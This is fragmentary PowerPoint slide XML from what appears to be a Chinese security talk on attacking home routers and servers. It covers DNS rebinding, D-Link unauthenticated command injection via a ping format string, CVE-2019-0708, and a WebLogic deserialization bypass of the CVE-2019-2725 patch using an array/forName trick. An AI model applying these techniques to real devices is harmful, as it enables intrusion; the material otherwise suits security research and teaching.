            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>DNS rebinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>实现跨域攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>访问恶意网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>代码二次请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>服务器再次解析域名，重绑定到本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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家用系列路由器的漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2100" dirty="0"/>
              <a:t>命令注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>D-Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>未授权远程命令注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（高危</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean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100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8129"/>
            <a:ext cx="9144000" cy="4589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670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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硕士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毕业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于清华大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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NISL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实验室，著名安全战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队“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Blue-lotus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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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蓝莲花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创始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成员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，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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多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年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网络安全攻防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经验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pP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擅长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漏洞挖掘和利用、渗透测试，跟踪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1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IoT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、区块链安全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等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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新兴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领域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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的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前沿研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="220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专著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安全畅销书《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1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metasploit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魔鬼训练营》、《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Python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黑帽子：黑客与渗透测试编程之道》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等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0">
              <a:latin typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pP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多次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在安全会议及漏洞破解大赛上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获奖（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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VARA 2012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优秀论文、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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CNCERT 2018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年中国网络安全年会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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-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智能破解挑战赛优胜奖、“天府杯”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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2019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国际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网络安全大赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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-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优胜奖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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、最佳原创漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0" smtClean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等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200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）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004098"/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 Me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家用系列路由器的漏洞攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2100" dirty="0"/>
              <a:t>命令注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>D-Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>未授权远程命令注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（高危</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean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100" dirty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100" dirty="0" smtClean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100" dirty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100" dirty="0" smtClean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100" dirty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100" dirty="0" smtClean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100" dirty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危害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：执行任意命令，劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>访问，僵尸网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>视频展示：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://research.qianxin.com/wp-content/uploads/2019/06/dns_rebind.mp4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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" y="1956435"/>
            <a:ext cx="3886200" cy="32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223260" y="3687693"/>
            <a:ext cx="564292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+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>str2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -c %d -w %d -s %d &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/ping.txt 2&gt;&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/ping.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0" dirty="0">
              <a:effectLst/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500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：从外到内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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 smtClean="0"/>
              <a:t>通用服务漏洞：利用软件漏洞，正面突破网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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操作系统默认开放服务：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>RDP3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>SMB445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>等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公开漏洞为主，未公开漏洞价值极高，很少出现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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 smtClean="0"/>
              <a:t>案例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>RDP 3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> CVE-2019-0708 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）漏洞检测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903655" y="3481921"/>
            <a:ext cx="5552902" cy="24522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3714" y="6129778"/>
            <a:ext cx="7832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SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>服务器操作系统未开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NLA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>认证，导致该漏洞可以直接远程命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>执行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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>最新漏洞利用（绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>CVE-2019-2725</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>补丁）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 smtClean="0"/>
              <a:t>原理：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800" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>J2EE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>的应用服务软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>application server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/>
              <a:t>反</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>序列化漏洞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800" dirty="0" smtClean="0"/>
              <a:t>CVE-2019-2725</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>补丁：禁用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>标签</a:t>
            </a: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 smtClean="0"/>
              <a:t>绕过：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800" dirty="0"/>
              <a:t>&lt;array method=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>forName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”&gt;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800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Class.forName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>classname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，从而绕过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>标签被禁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>的问题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800" dirty="0" err="1" smtClean="0"/>
              <a:t>jdk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1.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>标签虽没有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>属性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>自动补</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone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参考：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.kingkk.com/2018/09/weblogic%E6%BC%8F%E6%B4%9E%E7%BB%83%E4%B9%A0/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://www.freebuf.com/vuls/206374.html</a:t>
            </a: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1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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>最新漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="25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 smtClean="0"/>
              <a:t>攻击路径：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800" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>async</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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800" dirty="0" err="1" smtClean="0"/>
              <a:t>wls-wsat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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2100" dirty="0" err="1"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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1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7212"/>
            <a:ext cx="9144000" cy="3132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 err="1"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最新漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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某高校网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>已下线）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术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2" y="2267855"/>
            <a:ext cx="7093588" cy="3777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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sk-SK" altLang="zh-CN" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="sk-SK" sz="2500" dirty="0"/>
              <a:t>最新漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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 smtClean="0"/>
              <a:t>时间轴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官方补丁：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3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.oracle.com/technetwork/security-advisory/alert-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>cve-2019-2729</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-5570780.html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国内安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>团队：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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处于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
